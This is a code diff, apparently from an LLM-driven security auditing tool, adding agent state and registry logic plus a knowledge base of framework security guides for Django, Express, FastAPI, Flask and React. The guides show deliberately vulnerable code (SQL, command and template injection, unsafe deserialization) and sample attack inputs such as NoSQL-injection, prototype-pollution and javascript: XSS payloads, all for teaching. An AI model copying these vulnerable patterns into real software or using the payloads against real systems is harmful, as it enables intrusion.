node["result"] = result
logger.debug(f"Updated agent {agent_id} status to {status}")
def get_agent_status(self, agent_id: str) -> Optional[str]:
"""获取Agent状态"""
with self._lock:
if agent_id in self._agent_graph["nodes"]:
return self._agent_graph["nodes"][agent_id]["status"]
return None
# ============ Agent 查询 ============
def get_agent(self, agent_id: str) -> Optional[Any]:
"""获取Agent实例"""
return self._agent_instances.get(agent_id)
def get_agent_state(self, agent_id: str) -> Optional["AgentState"]:
"""获取Agent状态"""
return self._agent_states.get(agent_id)
def get_agent_node(self, agent_id: str) -> Optional[Dict[str, Any]]:
"""获取Agent节点信息"""
return self._agent_graph["nodes"].get(agent_id)
def get_root_agent_id(self) -> Optional[str]:
"""获取根Agent ID"""
return self._root_agent_id
def get_children(self, agent_id: str) -> List[str]:
"""获取子Agent ID列表"""
with self._lock:
node = self._agent_graph["nodes"].get(agent_id)
if node:
return node.get("children", [])
return []
def get_parent(self, agent_id: str) -> Optional[str]:
"""获取父Agent ID"""
with self._lock:
node = self._agent_graph["nodes"].get(agent_id)
if node:
return node.get("parent_id")
return None
# ============ Agent 树操作 ============
def get_agent_tree(self) -> Dict[str, Any]:
"""获取完整的Agent树结构"""
with self._lock:
return {
"nodes": dict(self._agent_graph["nodes"]),
"edges": list(self._agent_graph["edges"]),
"root_agent_id": self._root_agent_id,
}
def get_agent_tree_view(self, agent_id: Optional[str] = None) -> str:
"""获取Agent树的文本视图"""
with self._lock:
lines = ["=== AGENT TREE ==="]
root_id = agent_id or self._root_agent_id
if not root_id or root_id not in self._agent_graph["nodes"]:
return "No agents in the tree"
def _build_tree(aid: str, depth: int = 0) -> None:
node = self._agent_graph["nodes"].get(aid)
if not node:
return
indent = " " * depth
status_emoji = {
"running": "🔄",
"waiting": "",
"completed": "",
"failed": "",
"stopped": "🛑",
}.get(node["status"], "")
lines.append(f"{indent}{status_emoji} {node['name']} ({aid})")
lines.append(f"{indent} Task: {node['task'][:50]}...")
lines.append(f"{indent} Status: {node['status']}")
if node.get("knowledge_modules"):
lines.append(f"{indent} Modules: {', '.join(node['knowledge_modules'])}")
for child_id in node.get("children", []):
_build_tree(child_id, depth + 1)
_build_tree(root_id)
return "\n".join(lines)
def get_statistics(self) -> Dict[str, int]:
"""获取统计信息"""
with self._lock:
stats = {
"total": len(self._agent_graph["nodes"]),
"running": 0,
"waiting": 0,
"completed": 0,
"failed": 0,
"stopped": 0,
}
for node in self._agent_graph["nodes"].values():
status = node.get("status", "unknown")
if status in stats:
stats[status] += 1
return stats
# ============ 清理 ============
def clear(self) -> None:
"""清空注册表"""
with self._lock:
self._agent_graph = {"nodes": {}, "edges": []}
self._agent_instances.clear()
self._agent_states.clear()
self._agent_messages.clear()
self._running_agents.clear()
self._root_agent_id = None
logger.info("Agent registry cleared")
def cleanup_finished_agents(self) -> int:
"""清理已完成的Agent"""
with self._lock:
finished_ids = [
aid for aid, node in self._agent_graph["nodes"].items()
if node["status"] in ["completed", "failed", "stopped"]
]
for aid in finished_ids:
# 保留节点信息,但清理实例
self._agent_instances.pop(aid, None)
self._running_agents.pop(aid, None)
return len(finished_ids)
# 全局注册表实例
agent_registry = AgentRegistry()

View File

@ -0,0 +1,297 @@
"""
Agent 状态管理模块
提供完整的Agent状态管理支持
- 完整的生命周期管理
- 状态序列化和持久化
- 暂停和恢复
- 动态Agent树结构
"""
import uuid
from datetime import datetime, timezone
from enum import Enum
from typing import Any, Dict, List, Optional
from pydantic import BaseModel, Field
def _generate_agent_id() -> str:
"""生成唯一的Agent ID"""
return f"agent_{uuid.uuid4().hex[:8]}"
class AgentStatus(str, Enum):
"""Agent 运行状态"""
CREATED = "created" # 已创建,未开始
RUNNING = "running" # 运行中
WAITING = "waiting" # 等待中(等待消息或输入)
PAUSED = "paused" # 已暂停
COMPLETED = "completed" # 已完成
FAILED = "failed" # 失败
STOPPED = "stopped" # 被停止
STOPPING = "stopping" # 正在停止
class AgentState(BaseModel):
"""
Agent 状态模型
包含Agent执行所需的所有状态信息支持
- 完整的生命周期管理
- 状态序列化和持久化
- 暂停和恢复
- 动态Agent树结构
"""
# ============ 基本信息 ============
agent_id: str = Field(default_factory=_generate_agent_id)
agent_name: str = "DeepAudit Agent"
agent_type: str = "generic" # recon, analysis, verification, specialist
parent_id: Optional[str] = None # 父Agent ID用于动态Agent树
# ============ 任务信息 ============
task: str = ""
task_context: Dict[str, Any] = Field(default_factory=dict)
inherited_context: Dict[str, Any] = Field(default_factory=dict) # 从父Agent继承的上下文
# ============ 知识模块 ============
knowledge_modules: List[str] = Field(default_factory=list) # 加载的知识模块名称
# ============ 执行状态 ============
status: AgentStatus = AgentStatus.CREATED
iteration: int = 0
max_iterations: int = 50
# ============ 对话历史 ============
messages: List[Dict[str, Any]] = Field(default_factory=list)
system_prompt: str = ""
# ============ 执行记录 ============
actions_taken: List[Dict[str, Any]] = Field(default_factory=list)
observations: List[Dict[str, Any]] = Field(default_factory=list)
errors: List[str] = Field(default_factory=list)
# ============ 发现列表 ============
findings: List[Dict[str, Any]] = Field(default_factory=list)
# ============ 时间戳 ============
created_at: str = Field(default_factory=lambda: datetime.now(timezone.utc).isoformat())
started_at: Optional[str] = None
last_updated: str = Field(default_factory=lambda: datetime.now(timezone.utc).isoformat())
finished_at: Optional[str] = None
# ============ 等待状态 ============
waiting_for_input: bool = False
waiting_start_time: Optional[datetime] = None
waiting_reason: str = ""
waiting_timeout_seconds: int = 600 # 10分钟超时
# ============ 最终结果 ============
final_result: Optional[Dict[str, Any]] = None
# ============ 统计信息 ============
total_tokens: int = 0
tool_calls: int = 0
# ============ 标志位 ============
stop_requested: bool = False
max_iterations_warning_sent: bool = False
class Config:
use_enum_values = True
# ============ 状态管理方法 ============
def start(self) -> None:
"""开始执行"""
self.status = AgentStatus.RUNNING
self.started_at = datetime.now(timezone.utc).isoformat()
self._update_timestamp()
def increment_iteration(self) -> None:
"""增加迭代次数"""
self.iteration += 1
self._update_timestamp()
def set_completed(self, final_result: Optional[Dict[str, Any]] = None) -> None:
"""标记为完成"""
self.status = AgentStatus.COMPLETED
self.final_result = final_result
self.finished_at = datetime.now(timezone.utc).isoformat()
self._update_timestamp()
def set_failed(self, error: str) -> None:
"""标记为失败"""
self.status = AgentStatus.FAILED
self.add_error(error)
self.finished_at = datetime.now(timezone.utc).isoformat()
self._update_timestamp()
def request_stop(self) -> None:
"""请求停止"""
self.stop_requested = True
self.status = AgentStatus.STOPPING
self._update_timestamp()
def set_stopped(self) -> None:
"""标记为已停止"""
self.status = AgentStatus.STOPPED
self.finished_at = datetime.now(timezone.utc).isoformat()
self._update_timestamp()
# ============ 等待状态管理 ============
def enter_waiting_state(self, reason: str = "等待消息") -> None:
"""进入等待状态"""
self.waiting_for_input = True
self.waiting_start_time = datetime.now(timezone.utc)
self.waiting_reason = reason
self.status = AgentStatus.WAITING
self._update_timestamp()
def resume_from_waiting(self, new_task: Optional[str] = None) -> None:
"""从等待状态恢复"""
self.waiting_for_input = False
self.waiting_start_time = None
self.waiting_reason = ""
self.stop_requested = False
self.status = AgentStatus.RUNNING
if new_task:
self.task = new_task
self._update_timestamp()
def has_waiting_timeout(self) -> bool:
"""检查等待是否超时"""
if not self.waiting_for_input or not self.waiting_start_time:
return False
if self.stop_requested or self.status in [AgentStatus.COMPLETED, AgentStatus.FAILED]:
return False
elapsed = (datetime.now(timezone.utc) - self.waiting_start_time).total_seconds()
return elapsed > self.waiting_timeout_seconds
def is_waiting_for_input(self) -> bool:
"""是否在等待输入"""
return self.waiting_for_input
# ============ 执行控制 ============
def should_stop(self) -> bool:
"""是否应该停止"""
return (
self.stop_requested or
self.status in [AgentStatus.COMPLETED, AgentStatus.FAILED, AgentStatus.STOPPED] or
self.has_reached_max_iterations()
)
def has_reached_max_iterations(self) -> bool:
"""是否达到最大迭代次数"""
return self.iteration >= self.max_iterations
def is_approaching_max_iterations(self, threshold: float = 0.85) -> bool:
"""是否接近最大迭代次数"""
return self.iteration >= int(self.max_iterations * threshold)
# ============ 消息管理 ============
def add_message(self, role: str, content: Any) -> None:
"""添加消息"""
self.messages.append({
"role": role,
"content": content,
"timestamp": datetime.now(timezone.utc).isoformat(),
})
self._update_timestamp()
def get_conversation_history(self) -> List[Dict[str, Any]]:
"""获取对话历史不含时间戳用于LLM调用"""
return [{"role": m["role"], "content": m["content"]} for m in self.messages]
# ============ 执行记录 ============
def add_action(self, action: Dict[str, Any]) -> None:
"""记录执行的动作"""
self.actions_taken.append({
"iteration": self.iteration,
"timestamp": datetime.now(timezone.utc).isoformat(),
"action": action,
})
self.tool_calls += 1
self._update_timestamp()
def add_observation(self, observation: Dict[str, Any]) -> None:
"""记录观察结果"""
self.observations.append({
"iteration": self.iteration,
"timestamp": datetime.now(timezone.utc).isoformat(),
"observation": observation,
})
self._update_timestamp()
def add_error(self, error: str) -> None:
"""记录错误"""
self.errors.append(f"Iteration {self.iteration}: {error}")
self._update_timestamp()
def add_finding(self, finding: Dict[str, Any]) -> None:
"""添加发现"""
finding["discovered_at"] = datetime.now(timezone.utc).isoformat()
finding["discovered_by"] = self.agent_id
self.findings.append(finding)
self._update_timestamp()
# ============ 上下文管理 ============
def update_context(self, key: str, value: Any) -> None:
"""更新任务上下文"""
self.task_context[key] = value
self._update_timestamp()
def inherit_context(self, parent_context: Dict[str, Any]) -> None:
"""继承父Agent的上下文"""
self.inherited_context = parent_context.copy()
self._update_timestamp()
# ============ 统计和摘要 ============
def add_tokens(self, tokens: int) -> None:
"""添加token使用量"""
self.total_tokens += tokens
self._update_timestamp()
def get_execution_summary(self) -> Dict[str, Any]:
"""获取执行摘要"""
return {
"agent_id": self.agent_id,
"agent_name": self.agent_name,
"agent_type": self.agent_type,
"parent_id": self.parent_id,
"task": self.task,
"status": self.status,
"iteration": self.iteration,
"max_iterations": self.max_iterations,
"total_tokens": self.total_tokens,
"tool_calls": self.tool_calls,
"findings_count": len(self.findings),
"errors_count": len(self.errors),
"created_at": self.created_at,
"started_at": self.started_at,
"finished_at": self.finished_at,
"duration_seconds": self._calculate_duration(),
"knowledge_modules": self.knowledge_modules,
}
def _calculate_duration(self) -> Optional[float]:
"""计算执行时长"""
if not self.started_at:
return None
end_time = self.finished_at or datetime.now(timezone.utc).isoformat()
start = datetime.fromisoformat(self.started_at.replace('Z', '+00:00'))
end = datetime.fromisoformat(end_time.replace('Z', '+00:00'))
return (end - start).total_seconds()
def _update_timestamp(self) -> None:
"""更新最后修改时间"""
self.last_updated = datetime.now(timezone.utc).isoformat()

View File

@ -354,7 +354,7 @@ class EventManager:
"""创建或获取事件队列""" """创建或获取事件队列"""
if task_id not in self._event_queues: if task_id not in self._event_queues:
# 🔥 使用较大的队列容量,缓存更多 token 事件 # 🔥 使用较大的队列容量,缓存更多 token 事件
self._event_queues[task_id] = asyncio.Queue(maxsize=1000) self._event_queues[task_id] = asyncio.Queue(maxsize=5000)
return self._event_queues[task_id] return self._event_queues[task_id]
def remove_queue(self, task_id: str): def remove_queue(self, task_id: str):

View File

@ -193,17 +193,36 @@ class AgentRunner:
"""初始化工具集""" """初始化工具集"""
await self.event_emitter.emit_info("初始化 Agent 工具集...") await self.event_emitter.emit_info("初始化 Agent 工具集...")
# 🔥 导入新工具
from app.services.agent.tools import (
ThinkTool, ReflectTool,
CreateVulnerabilityReportTool,
)
# 🔥 导入知识查询工具
from app.services.agent.knowledge import (
SecurityKnowledgeQueryTool,
GetVulnerabilityKnowledgeTool,
)
# 🔥 获取排除模式和目标文件
exclude_patterns = self.task.exclude_patterns or []
target_files = self.task.target_files or None
# ============ 基础工具(所有 Agent 共享)============ # ============ 基础工具(所有 Agent 共享)============
base_tools = { base_tools = {
"read_file": FileReadTool(self.project_root), "read_file": FileReadTool(self.project_root, exclude_patterns, target_files),
"list_files": ListFilesTool(self.project_root), "list_files": ListFilesTool(self.project_root, exclude_patterns, target_files),
# 🔥 新增思考工具所有Agent可用
"think": ThinkTool(),
} }
# ============ Recon Agent 专属工具 ============ # ============ Recon Agent 专属工具 ============
# 职责:信息收集、项目结构分析、技术栈识别 # 职责:信息收集、项目结构分析、技术栈识别
self.recon_tools = { self.recon_tools = {
**base_tools, **base_tools,
"search_code": FileSearchTool(self.project_root), "search_code": FileSearchTool(self.project_root, exclude_patterns, target_files),
# 🔥 新增:反思工具
"reflect": ReflectTool(),
} }
# RAG 工具Recon 用于语义搜索) # RAG 工具Recon 用于语义搜索)
@ -214,10 +233,11 @@ class AgentRunner:
# 职责:漏洞分析、代码审计、模式匹配 # 职责:漏洞分析、代码审计、模式匹配
self.analysis_tools = { self.analysis_tools = {
**base_tools, **base_tools,
"search_code": FileSearchTool(self.project_root), "search_code": FileSearchTool(self.project_root, exclude_patterns, target_files),
# 模式匹配和代码分析 # 模式匹配和代码分析
"pattern_match": PatternMatchTool(self.project_root), "pattern_match": PatternMatchTool(self.project_root),
"code_analysis": CodeAnalysisTool(self.llm_service), # TODO: code_analysis 工具暂时禁用,因为 LLM 调用经常失败
# "code_analysis": CodeAnalysisTool(self.llm_service),
"dataflow_analysis": DataFlowAnalysisTool(self.llm_service), "dataflow_analysis": DataFlowAnalysisTool(self.llm_service),
# 外部静态分析工具 # 外部静态分析工具
"semgrep_scan": SemgrepTool(self.project_root), "semgrep_scan": SemgrepTool(self.project_root),
@ -227,6 +247,11 @@ class AgentRunner:
"npm_audit": NpmAuditTool(self.project_root), "npm_audit": NpmAuditTool(self.project_root),
"safety_scan": SafetyTool(self.project_root), "safety_scan": SafetyTool(self.project_root),
"osv_scan": OSVScannerTool(self.project_root), "osv_scan": OSVScannerTool(self.project_root),
# 🔥 新增:反思工具
"reflect": ReflectTool(),
# 🔥 新增安全知识查询工具基于RAG
"query_security_knowledge": SecurityKnowledgeQueryTool(),
"get_vulnerability_knowledge": GetVulnerabilityKnowledgeTool(),
} }
# RAG 工具Analysis 用于安全相关代码搜索) # RAG 工具Analysis 用于安全相关代码搜索)
@ -241,6 +266,10 @@ class AgentRunner:
# 验证工具 # 验证工具
"vulnerability_validation": VulnerabilityValidationTool(self.llm_service), "vulnerability_validation": VulnerabilityValidationTool(self.llm_service),
"dataflow_analysis": DataFlowAnalysisTool(self.llm_service), "dataflow_analysis": DataFlowAnalysisTool(self.llm_service),
# 🔥 新增漏洞报告工具仅Verification可用
"create_vulnerability_report": CreateVulnerabilityReportTool(),
# 🔥 新增:反思工具
"reflect": ReflectTool(),
} }
# 沙箱工具(仅 Verification Agent 可用) # 沙箱工具(仅 Verification Agent 可用)

View File

@ -0,0 +1,59 @@
"""
知识模块系统 - 基于RAG的安全知识检索
提供专业的安全知识检索能力支持
- 漏洞类型知识SQL注入XSS命令注入等
- 框架安全知识FastAPIDjangoFlaskExpress等
- 安全最佳实践
- 修复建议
- 代码模式识别
知识库采用模块化组织
- vulnerabilities/: 漏洞类型知识
- frameworks/: 框架安全知识
"""
# 基础定义
from .base import KnowledgeDocument, KnowledgeCategory
# 知识加载器
from .loader import (
KnowledgeLoader,
knowledge_loader,
get_available_modules,
get_module_content,
)
# RAG知识检索
from .rag_knowledge import (
SecurityKnowledgeRAG,
security_knowledge_rag,
)
# 知识查询工具
from .tools import (
SecurityKnowledgeQueryTool,
GetVulnerabilityKnowledgeTool,
ListKnowledgeModulesTool,
)
__all__ = [
# 基础定义
"KnowledgeDocument",
"KnowledgeCategory",
# 知识加载器
"KnowledgeLoader",
"knowledge_loader",
"get_available_modules",
"get_module_content",
# RAG知识检索
"SecurityKnowledgeRAG",
"security_knowledge_rag",
# 知识查询工具
"SecurityKnowledgeQueryTool",
"GetVulnerabilityKnowledgeTool",
"ListKnowledgeModulesTool",
]

View File

@ -0,0 +1,61 @@
"""
知识模块基础定义
定义知识文档的数据结构和类别
"""
from dataclasses import dataclass, field
from enum import Enum
from typing import Any, Dict, List, Optional
class KnowledgeCategory(Enum):
"""知识类别"""
VULNERABILITY = "vulnerability" # 漏洞类型
FRAMEWORK = "framework" # 框架安全
BEST_PRACTICE = "best_practice" # 最佳实践
REMEDIATION = "remediation" # 修复建议
CODE_PATTERN = "code_pattern" # 代码模式
COMPLIANCE = "compliance" # 合规要求
@dataclass
class KnowledgeDocument:
"""知识文档"""
id: str
title: str
content: str
category: KnowledgeCategory
tags: List[str] = field(default_factory=list)
severity: Optional[str] = None
cwe_ids: List[str] = field(default_factory=list)
owasp_ids: List[str] = field(default_factory=list)
metadata: Dict[str, Any] = field(default_factory=dict)
def to_dict(self) -> Dict[str, Any]:
return {
"id": self.id,
"title": self.title,
"content": self.content,
"category": self.category.value,
"tags": self.tags,
"severity": self.severity,
"cwe_ids": self.cwe_ids,
"owasp_ids": self.owasp_ids,
"metadata": self.metadata,
}
def to_embedding_text(self) -> str:
"""生成用于嵌入的文本"""
parts = [
f"Title: {self.title}",
f"Category: {self.category.value}",
]
if self.tags:
parts.append(f"Tags: {', '.join(self.tags)}")
if self.cwe_ids:
parts.append(f"CWE: {', '.join(self.cwe_ids)}")
if self.owasp_ids:
parts.append(f"OWASP: {', '.join(self.owasp_ids)}")
parts.append(f"Content: {self.content}")
return "\n".join(parts)

View File

@ -0,0 +1,32 @@
"""
框架安全知识模块
包含各种框架的安全特性和常见漏洞模式
"""
from .fastapi import FASTAPI_SECURITY
from .django import DJANGO_SECURITY
from .flask import FLASK_SECURITY
from .express import EXPRESS_SECURITY
from .react import REACT_SECURITY
from .supabase import SUPABASE_SECURITY
# 所有框架知识文档
ALL_FRAMEWORK_DOCS = [
FASTAPI_SECURITY,
DJANGO_SECURITY,
FLASK_SECURITY,
EXPRESS_SECURITY,
REACT_SECURITY,
SUPABASE_SECURITY,
]
__all__ = [
"ALL_FRAMEWORK_DOCS",
"FASTAPI_SECURITY",
"DJANGO_SECURITY",
"FLASK_SECURITY",
"EXPRESS_SECURITY",
"REACT_SECURITY",
"SUPABASE_SECURITY",
]

View File

@ -0,0 +1,117 @@
"""
Django 框架安全知识
"""
from ..base import KnowledgeDocument, KnowledgeCategory
DJANGO_SECURITY = KnowledgeDocument(
id="framework_django",
title="Django Security",
category=KnowledgeCategory.FRAMEWORK,
tags=["django", "python", "web", "orm"],
content="""
Django 内置了许多安全保护但不当使用仍可能引入漏洞
## 内置安全特性
1. CSRF保护
2. XSS防护模板自动转义
3. SQL注入防护ORM
4. 点击劫持防护
5. 安全的密码哈希
## 常见漏洞模式
### SQL注入
```python
# 危险 - raw()和extra()
User.objects.raw(f"SELECT * FROM users WHERE name = '{name}'")
User.objects.extra(where=[f"name = '{name}'"])
# 危险 - RawSQL
from django.db.models.expressions import RawSQL
User.objects.annotate(val=RawSQL(f"SELECT {user_input}"))
# 安全 - 使用ORM
User.objects.filter(name=name)
User.objects.raw("SELECT * FROM users WHERE name = %s", [name])
```
### XSS
```python
# 危险 - 禁用自动转义
{{ user_input|safe }}
{% autoescape off %}{{ user_input }}{% endautoescape %}
mark_safe(user_input)
# 安全 - 默认转义
{{ user_input }}
```
### CSRF绕过
```python
# 危险 - 禁用CSRF
@csrf_exempt
def my_view(request):
pass
# 危险 - 全局禁用
MIDDLEWARE = [
# 'django.middleware.csrf.CsrfViewMiddleware', # 被注释
]
```
### 不安全的反序列化
```python
# 危险 - 签名数据可被篡改
from django.core import signing
data = signing.loads(user_input) # 如果SECRET_KEY泄露
# 危险 - pickle
import pickle
data = pickle.loads(request.body)
```
### 敏感信息泄露
```python
# 危险 - DEBUG模式在生产环境
DEBUG = True # settings.py
# 危险 - 详细错误信息
ALLOWED_HOSTS = [] # 空列表在DEBUG=False时会报错
```
### 文件上传
```python
# 危险 - 不验证文件类型
def upload(request):
file = request.FILES['file']
with open(f'/uploads/{file.name}', 'wb') as f:
f.write(file.read())
# 安全 - 验证和重命名
import uuid
def upload(request):
file = request.FILES['file']
ext = os.path.splitext(file.name)[1].lower()
if ext not in ['.jpg', '.png', '.pdf']:
raise ValidationError("Invalid file type")
safe_name = f"{uuid.uuid4()}{ext}"
# 使用Django的文件存储
default_storage.save(safe_name, file)
```
## 安全配置检查
```python
# settings.py 安全配置
DEBUG = False
SECRET_KEY = os.environ.get('DJANGO_SECRET_KEY')
ALLOWED_HOSTS = ['example.com']
SECURE_SSL_REDIRECT = True
SESSION_COOKIE_SECURE = True
CSRF_COOKIE_SECURE = True
SECURE_HSTS_SECONDS = 31536000
X_FRAME_OPTIONS = 'DENY'
```
""",
)

View File

@ -0,0 +1,148 @@
"""
Express.js 框架安全知识
"""
from ..base import KnowledgeDocument, KnowledgeCategory
EXPRESS_SECURITY = KnowledgeDocument(
id="framework_express",
title="Express.js Security",
category=KnowledgeCategory.FRAMEWORK,
tags=["express", "nodejs", "javascript", "api"],
content="""
Express.js 是Node.js最流行的Web框架需要注意多种安全问题
## 常见漏洞模式
### NoSQL注入
```javascript
// 危险 - MongoDB查询注入
app.post('/login', async (req, res) => {
const user = await User.findOne({
username: req.body.username,
password: req.body.password
});
// 攻击: {"username": {"$ne": ""}, "password": {"$ne": ""}}
});
// 安全 - 类型验证
app.post('/login', async (req, res) => {
const { username, password } = req.body;
if (typeof username !== 'string' || typeof password !== 'string') {
return res.status(400).json({ error: 'Invalid input' });
}
const user = await User.findOne({ username, password });
});
```
### 原型污染
```javascript
// 危险 - 合并用户输入
const merge = require('lodash.merge');
app.post('/config', (req, res) => {
merge(config, req.body);
// 攻击: {"__proto__": {"isAdmin": true}}
});
// 安全 - 使用Object.assign或白名单
app.post('/config', (req, res) => {
const allowed = ['theme', 'language'];
allowed.forEach(key => {
if (req.body[key]) config[key] = req.body[key];
});
});
```
### 命令注入
```javascript
// 危险
const { exec } = require('child_process');
app.get('/ping', (req, res) => {
exec(`ping ${req.query.host}`, (err, stdout) => {
res.send(stdout);
});
});
// 安全 - 使用execFile和参数数组
const { execFile } = require('child_process');
app.get('/ping', (req, res) => {
execFile('ping', ['-c', '4', req.query.host], (err, stdout) => {
res.send(stdout);
});
});
```
### XSS
```javascript
// 危险 - 直接输出用户输入
app.get('/search', (req, res) => {
res.send(`<h1>Results for: ${req.query.q}</h1>`);
});
// 安全 - 使用模板引擎或转义
const escape = require('escape-html');
app.get('/search', (req, res) => {
res.send(`<h1>Results for: ${escape(req.query.q)}</h1>`);
});
```
### 路径遍历
```javascript
// 危险
app.get('/files/:name', (req, res) => {
res.sendFile(`/uploads/${req.params.name}`);
});
// 安全 - 验证路径
const path = require('path');
app.get('/files/:name', (req, res) => {
const safePath = path.join('/uploads', req.params.name);
if (!safePath.startsWith('/uploads/')) {
return res.status(400).send('Invalid path');
}
res.sendFile(safePath);
});
```
### 不安全的依赖
```javascript
// 危险 - 使用有漏洞的包
const serialize = require('node-serialize');
const obj = serialize.unserialize(userInput); // RCE!
// 安全 - 使用JSON
const obj = JSON.parse(userInput);
```
## 安全中间件
```javascript
const helmet = require('helmet');
const rateLimit = require('express-rate-limit');
// 安全头
app.use(helmet());
// 速率限制
app.use(rateLimit({
windowMs: 15 * 60 * 1000,
max: 100
}));
// CORS
const cors = require('cors');
app.use(cors({
origin: 'https://example.com',
credentials: true
}));
```
## 安全检查清单
1. 使用helmet设置安全头
2. 实现速率限制
3. 验证所有用户输入类型
4. 使用参数化查询
5. 定期更新依赖 (npm audit)
6. 不要在错误中暴露堆栈信息
""",
)

View File

@ -0,0 +1,109 @@
"""
FastAPI 框架安全知识
"""
from ..base import KnowledgeDocument, KnowledgeCategory
FASTAPI_SECURITY = KnowledgeDocument(
id="framework_fastapi",
title="FastAPI Security",
category=KnowledgeCategory.FRAMEWORK,
tags=["fastapi", "python", "api", "async", "pydantic"],
content="""
FastAPI 是一个现代Python Web框架内置了许多安全特性但仍需注意一些常见问题
## 安全特性
1. Pydantic自动数据验证
2. 自动生成OpenAPI文档
3. 内置OAuth2/JWT支持
4. 依赖注入系统
## 常见漏洞模式
### SQL注入
```python
# 危险 - 原始SQL
@app.get("/users")
async def get_users(name: str):
query = f"SELECT * FROM users WHERE name = '{name}'"
return await database.fetch_all(query)
# 安全 - 参数化查询
@app.get("/users")
async def get_users(name: str):
query = "SELECT * FROM users WHERE name = :name"
return await database.fetch_all(query, {"name": name})
```
### IDOR
```python
# 危险 - 无权限检查
@app.get("/users/{user_id}")
async def get_user(user_id: int):
return await User.get(user_id)
# 安全 - 验证权限
@app.get("/users/{user_id}")
async def get_user(user_id: int, current_user: User = Depends(get_current_user)):
if user_id != current_user.id and not current_user.is_admin:
raise HTTPException(status_code=403)
return await User.get(user_id)
```
### 路径遍历
```python
# 危险
@app.get("/files/{filename}")
async def get_file(filename: str):
return FileResponse(f"/uploads/{filename}")
# 安全 - 验证路径
@app.get("/files/{filename}")
async def get_file(filename: str):
safe_path = Path("/uploads").resolve() / filename
if not str(safe_path.resolve()).startswith(str(Path("/uploads").resolve())):
raise HTTPException(status_code=400)
return FileResponse(safe_path)
```
### JWT配置问题
```python
# 危险 - 弱密钥
SECRET_KEY = "secret"
# 危险 - 不验证签名
jwt.decode(token, options={"verify_signature": False})
# 安全
SECRET_KEY = os.environ.get("JWT_SECRET_KEY")
jwt.decode(token, SECRET_KEY, algorithms=["HS256"])
```
### CORS配置
```python
# 危险 - 允许所有来源
app.add_middleware(
CORSMiddleware,
allow_origins=["*"],
allow_credentials=True, # 危险组合!
)
# 安全 - 指定来源
app.add_middleware(
CORSMiddleware,
allow_origins=["https://example.com"],
allow_credentials=True,
)
```
## 安全检查清单
1. 所有端点是否有适当的认证
2. 是否使用Depends进行权限检查
3. 文件操作是否验证路径
4. SQL查询是否参数化
5. CORS配置是否合理
6. JWT密钥是否安全存储
7. 敏感数据是否在响应中暴露
""",
)

View File

@ -0,0 +1,139 @@
"""
Flask 框架安全知识
"""
from ..base import KnowledgeDocument, KnowledgeCategory
FLASK_SECURITY = KnowledgeDocument(
id="framework_flask",
title="Flask Security",
category=KnowledgeCategory.FRAMEWORK,
tags=["flask", "python", "web", "jinja2"],
content="""
Flask 是一个轻量级框架安全性很大程度上取决于开发者的实现
## 常见漏洞模式
### 模板注入 (SSTI)
```python
# 危险 - 用户输入作为模板
from flask import render_template_string
@app.route('/hello')
def hello():
name = request.args.get('name')
return render_template_string(f'Hello {name}!')
# 攻击: ?name={{config}}
# 安全 - 使用参数
@app.route('/hello')
def hello():
name = request.args.get('name')
return render_template_string('Hello {{ name }}!', name=name)
```
### XSS
```python
# 危险 - 禁用转义
from markupsafe import Markup
return Markup(user_input)
# 模板中
{{ user_input|safe }}
# 安全 - 默认转义
return render_template('page.html', content=user_input)
```
### SQL注入
```python
# 危险 - 字符串拼接
@app.route('/user/<name>')
def get_user(name):
cursor.execute(f"SELECT * FROM users WHERE name = '{name}'")
# 安全 - 参数化
@app.route('/user/<name>')
def get_user(name):
cursor.execute("SELECT * FROM users WHERE name = ?", (name,))
```
### 会话安全
```python
# 危险 - 弱密钥
app.secret_key = 'dev'
# 危险 - 硬编码密钥
app.secret_key = 'super-secret-key-12345'
# 安全
app.secret_key = os.environ.get('FLASK_SECRET_KEY')
```
### 文件上传
```python
# 危险 - 不验证文件
@app.route('/upload', methods=['POST'])
def upload():
file = request.files['file']
file.save(f'/uploads/{file.filename}')
# 安全 - 验证和安全文件名
from werkzeug.utils import secure_filename
ALLOWED_EXTENSIONS = {'png', 'jpg', 'pdf'}
def allowed_file(filename):
return '.' in filename and \\
filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS
@app.route('/upload', methods=['POST'])
def upload():
file = request.files['file']
if file and allowed_file(file.filename):
filename = secure_filename(file.filename)
file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))
```
### 开放重定向
```python
# 危险 - 未验证的重定向
@app.route('/redirect')
def redirect_url():
url = request.args.get('url')
return redirect(url)
# 安全 - 验证URL
from urllib.parse import urlparse
@app.route('/redirect')
def redirect_url():
url = request.args.get('url', '/')
# 只允许相对路径或同域名
parsed = urlparse(url)
if parsed.netloc and parsed.netloc != request.host:
return redirect('/')
return redirect(url)
```
### Debug模式
```python
# 危险 - 生产环境开启debug
if __name__ == '__main__':
app.run(debug=True) # 可能导致RCE
# 安全
if __name__ == '__main__':
app.run(debug=os.environ.get('FLASK_DEBUG', 'False') == 'True')
```
## 安全配置
```python
app.config.update(
SECRET_KEY=os.environ.get('SECRET_KEY'),
SESSION_COOKIE_SECURE=True,
SESSION_COOKIE_HTTPONLY=True,
SESSION_COOKIE_SAMESITE='Lax',
)
```
""",
)

View File

@ -0,0 +1,137 @@
"""
React 框架安全知识
"""
from ..base import KnowledgeDocument, KnowledgeCategory
REACT_SECURITY = KnowledgeDocument(
id="framework_react",
title="React Security",
category=KnowledgeCategory.FRAMEWORK,
tags=["react", "javascript", "frontend", "jsx"],
content="""
React 默认对XSS有较好的防护但仍有一些需要注意的安全问题
## 安全特性
1. JSX自动转义
2. 虚拟DOM隔离
## 常见漏洞模式
### dangerouslySetInnerHTML
```jsx
// 危险 - 直接渲染HTML
function Comment({ content }) {
return <div dangerouslySetInnerHTML={{ __html: content }} />;
}
// 安全 - 使用DOMPurify
import DOMPurify from 'dompurify';
function Comment({ content }) {
return <div dangerouslySetInnerHTML={{
__html: DOMPurify.sanitize(content)
}} />;
}
```
### href/src注入
```jsx
// 危险 - javascript:协议
function Link({ url }) {
return <a href={url}>Click</a>;
// 攻击: url = "javascript:alert('XSS')"
}
// 安全 - 验证协议
function Link({ url }) {
const safeUrl = url.startsWith('http') ? url : '#';
return <a href={safeUrl}>Click</a>;
}
```
### eval和Function
```jsx
// 危险
function Calculator({ expression }) {
const result = eval(expression); // RCE风险
return <div>{result}</div>;
}
// 安全 - 使用安全的表达式解析器
import { evaluate } from 'mathjs';
function Calculator({ expression }) {
const result = evaluate(expression);
return <div>{result}</div>;
}
```
### 服务端渲染(SSR) XSS
```jsx
// 危险 - Next.js中
export async function getServerSideProps({ query }) {
return {
props: {
search: query.q // 未转义
}
